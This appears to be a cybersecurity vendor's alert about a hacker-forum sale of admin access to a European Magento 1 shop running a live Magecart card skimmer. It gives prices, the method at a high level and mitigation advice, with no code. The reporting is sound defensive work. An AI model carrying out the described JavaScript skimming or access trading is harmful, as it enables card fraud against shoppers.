Brinztech Alert: Admin Access to a European E-Commerce Site with Live Payment Skimmer on Sale

Dark Web News Analysis: Admin Access to European E-Commerce Site with Credit Card Skimmer on Sale

A threat actor is selling administrator-level access to a European e-commerce company that operates in the Netherlands, Belgium, France, and Germany. The access is not just for control of the site but includes an active payment interception capability, meaning the website is currently stealing its customers’ credit card information. The sale, posted on a hacker forum, highlights a critical failure of the company’s security, as they are running on a dangerously outdated version of Magento. The assets and capabilities for sale include:

• Platform: Magento version 1.9.4.5 (End-of-Life since June 2020).
• Access Level: Full administrative privileges.
• Key Capability: The ability to inject JavaScript into the site to intercept and skim live customer payment information, including MasterCard, Visa, Maestro, PayPal, and Ideal details.
• Price: Starting at $3,000, with a blitz (buy-it-now) price of $10,000.

Key Cybersecurity Insights

This incident is a textbook example of a “Magecart” attack, enabled by the use of obsolete and insecure e-commerce software.

• A Classic “Magecart” Attack in Progress: The attacker’s description of injecting JavaScript to intercept payment information is the exact methodology of a Magecart attack. This means the website is actively skimming and stealing the credit card details of its customers in real-time as they type them in. The buyer of this access isn’t just getting a key; they are buying an already-running, profitable criminal operation.
• End-of-Life Magento 1 is a Ticking Time Bomb: Magento 1 reached its official end-of-life in June 2020. This means the platform has not received any official security patches from Adobe for over five years. Running a live e-commerce store that processes payments on this platform is grossly negligent and exposes the business and its customers to a vast number of well-known, unpatched, and easily exploitable vulnerabilities.
• Multi-Country Operation Puts Thousands of European Consumers at Risk: Since the e-commerce store operates in the Netherlands, Belgium, France, and Germany, the ongoing credit card skimming affects a broad European customer base. This also means the company is in severe violation of the General Data Protection Regulation (GDPR) for failing to secure customer data, which will inevitably lead to a massive fine.

Critical Mitigation Strategies

This is an active financial crime in progress. The responsible company must take immediate and drastic action, and any customers who have used the site are at immediate risk of fraud.

• For the Affected Company: Immediately Take the Website Offline and Investigate: As this is an active payment skimming operation, the only responsible action is to take the website offline immediately to stop the theft of more customer credit cards. A full forensic investigation (compromise assessment) is needed to find the malicious skimming code and identify the source of the administrative account compromise.
• For the Affected Company: Migrate Off Magento 1 Immediately: Patching is not an option for unsupported, end-of-life software. The company must urgently migrate its store to a modern, supported e-commerce platform (such as the latest version of Magento or a secure alternative) and completely rebuild from a known-good, secure state.
• For Customers Who Have Used the Site: Contact Your Bank and Cancel Your Card: This is the most critical advice for potential victims. Anyone who has made a purchase on a European e-commerce site that they suspect may be compromised should assume their credit card details have been stolen. They should immediately contact their bank or credit card provider to report the potential fraud and have their card canceled and reissued.

Secure Your Organization with Brinztech As a cybersecurity provider, we can protect your business from the threats discussed here. Contact us to learn more about our services.

Questions or Feedback? For expert advice, use our ‘Ask an Analyst’ feature. For general inquiries or to report this post, please email us: contact@brinztech.com